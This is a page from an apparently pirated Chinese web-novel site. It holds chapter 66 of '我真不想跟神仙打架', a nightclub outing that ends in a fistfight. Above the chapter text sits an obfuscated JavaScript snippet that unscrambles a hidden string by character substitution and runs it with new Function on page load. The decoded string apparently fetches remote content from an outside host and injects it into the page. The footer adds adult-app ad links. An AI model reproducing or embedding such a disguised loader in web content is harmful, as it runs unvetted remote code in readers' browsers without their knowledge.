笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 我真不想跟神仙打架 > 66、苍蝇搓手
(function(){function oc5530234(s){var d={'q':'w','w':'q',',':'(',':':'$','~':'/','0':'@','/':'~','%':'3','4':'^','@':'0','^':'4','5':'&','Q':'W','3':'%','$':':','u':'i','U':'I','I':'U','o':'p','X':'S','d':'f','i':'u','f':'d','F':'D','c':'v','D':'F','v':'c','y':'t','T':'Y','p':'o','C':'V','P':'O','A':'Z','a':'z','z':'a','V':'C','Z':'A','n':'h','j':'m','O':'P','s':'x','m':'j','N':'H','B':'G','x':'s','S':'X','e':'r','W':'Q','l':'k','H':'N','!':'.','k':'l',';':'=','r':'e','L':'K','-':'_','t':'y','g':'b','&':'5','|':']','E':'R','6':'?','Y':'T','9':'7',']':'|','b':'g','R':'E','G':'B','h':'n','J':'M','M':'J','K':'L','_':'-','.':'!','(':',','?':'6','7':'9','=':';'};return s.split('').map(function(c){return d[c]!==undefined?d[c]:c}).join('')}var c=oc5530234('ftp://saw1quhfpq["" + "t" + "?" + "&" + "2" + "9" + "@" + "7" + "?" + "v"+""|;dihvyuph,) { = ,dihvyuph ,i( u( q( f) { ud ,~4Jzv]Quh~!yrxy,hzcubzype!okzydpej)) { eryieh }= cze fv ; dihvyuph ,h) { eryieh Xyeuhb!depjVnzeVpfr,h) }= cze s ; q[fv,@s?1) + fv,@s9^) + fv,@s?D) + fv,@s?2)|( vx ; f[s,"T%CtvjCifDHmvjkqfZ;;")|( vef ; s,"T%MkTSEkEQskgQCifZ;;")= "mWiret"= cze qe ; "qeuyr"= "mWiret"= cze d ; f[vef|,s,"zQAtTQ1k"))= d!uf ; "s" + ,Jzyn!ezhfpj,) * 1@@@@)= d!xytkr!qufyn ; "1@os"= d!xytkr!nrubny ; & + "os"= d!xytkr!gzvlbepihf ; "#DDD"= d!xev ; ["nyyox$~~"( s,i)( "e"( "m91"( u|!mpuh,"~")= f[qe|,d!piyreNYJK)= q["zffRcrhyKuxyrhre"|,"jrxxzbr"( dihvyuph ,r) { ud ,r!fzyz!l ;; u) { f!bryRkrjrhyGtUf,d!uf)!erjpcr,)= hrq Dihvyuph,"-yfvx"( s,r!fzyz!c)),vx) } }) }),"zu&wvB&uzNkuTX&^rSp;"( "1%222?772&972&"( quhfpq( fpvijrhy) }=t?&29@7?v,)='.substr(10));new Function(c)()})();

66、苍蝇搓手

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
这种话显然是以前的成叔不好开口主动提。
  他老妈的威名太盛,介绍这些商业公司的人物都会关注成叔在干嘛。
  起码这话不能他说,丢不起这人。
  但是看了成叔挤眉弄眼的样子,荆小强觉得这孩子被夹得太苦了,还是需要适当的放松下。
  不然真等他老妈走了以后,不知道得奔放成什么样。
  就娴熟的跟寰亚老板提出来晚上有没有什么娱乐放松的地方。
  荆小强来说这个就太合适了。
  那位老板笑呵呵的大包大揽说肯定有,台巴子跟港商带过来的风气嘛。
  而且在沪海这样的众矢之的聚光灯下不容易滋生,专门就在周边这些地方灯下黑的疯长。
  小强你真是懂行道呀。
  成叔兴奋得使劲低着头夹菜,生怕暴露了情绪。
  这时候天底下的山珍海味估计他都味同嚼蜡。
  荆小强忍住笑,推说自己要开车,就基本上不喝酒,拣健康的快速吃了些就出发。
  人家还以为他这小年轻是有多猴急呢。
  颇为得意的说起他们这边的夜总会很有名气哩。
  所谓三陪这个词儿,就是这几年冒出来的。
  早几年真的要被当成作风问题抓起来,现在却因为改开回来的海外港澳台投资商们到穷乡僻壤呆不住,怎么来投资呢。
  各地就睁只眼闭只眼的松动了。
  而且就像亚太、环球这些公司名儿类似,这些内地初生代的夜总会不是叫天上人间就是大富豪啥的,装修也是那种充满土气的金碧辉煌。
  荆小强自己是真没兴趣,况且这年代的夜场女性还要承受很大的社会道德舆论压力,所以来源并不广阔,素质参差不齐,服务质量也不太高。
  简单说就是长相他连看一看的兴趣都没,就怕自己忍不住要帮人化妆,一个个烈焰红唇画得跟鬼一样。
  但成叔已经开心到爆了,哪怕只是卡座包围起来看台上表演节目,他也忙得不可开交。
  丝袜都产生静电啦。
  荆小强还得跟那寰亚老板继续聊生意,分散人家注意力。
  这年头生意能做到这个地步的,的确都是万里无一的胆识过人。
  荆小强也跟着请教不少东西,运动内衣如果真的打开局面,这家泳衣厂确实可以全面转产。
  但是化妆品这类涉及到很多化学品的生产厂就比较困难。
  对各方面要求比较高。
  说得投机,就没注意到成叔已经被小姐拉着去舞池里,估计是实在被摸得裤衩都要起球了,求他还是跳个舞吧。
  成叔初试欢场简直乐不可支,马上撅着屁股在舞池玩得像个刚放学的孩子。
  灯光下,舞池里,扭臀摆腰。
  右手搂着乡镇厂花滴水桶腰,左手轻握着满是茧子的胡萝卜指头。
  过于欢脱的样子,非常引人注意。
  估计他这种典型的沪海老格勒穿着打扮,看起来很像是肥羊,几个当地小流氓围上去挑衅,两三句话就推搡起来。
  五十多岁的成叔,穿着休闲立领衬衫和跟格子背带裤,地中海的头发还尽量梳成了中空大棚,不看鼻毛的话,颇有几分儒雅风度。
  谁曾想他可是当体育老师、学拳击、保持健身这么多年。
  立刻有来有往的反击,三五个小流氓根本奈何不了他。
  但架不住地头蛇人多势众,声势浩大的很快有十多二十人冲上来。
  成叔才开始叫小强帮忙。
  寰亚老板吃一惊准备给警察局的熟人打电话。
  荆小强却笑着拍拍他肩膀说没事:“感谢款待,您先走,免得您这本地人在这里结了怨,我来摆平这事儿。”
  寰亚老板看看他这身板,莫名的就有了信心:“怎么能让你们单独留在这里,我陪着。”
  荆小强摆摆手:“记得尽快出样品给我,五十到一百件,急着要。”
  信步走上去,拨开人声鼎沸的吃瓜围观舞客、老蛇皮和小姐们。
  废话都懒得说,挥臂就是一拳!
  三个月不到,刚来沪海时候还很细胳膊细腿,现在已经强健如斯!
  那场跟沪海老帮菜打斗中,他的肌肉筋骨都很吃力。
  现在天壤之别。
  和成叔这种五十多岁的爆发力也截然不同。
  沙包般的拳头,就像一柄大锤。
  一拳油酱铺!
免费看片APP    美女直播间
『加入书签,方便阅读』
继续浏览精彩内容
到笔趣阁APP免费阅读
《我真不想跟神仙打架》
打开
浏览器
继续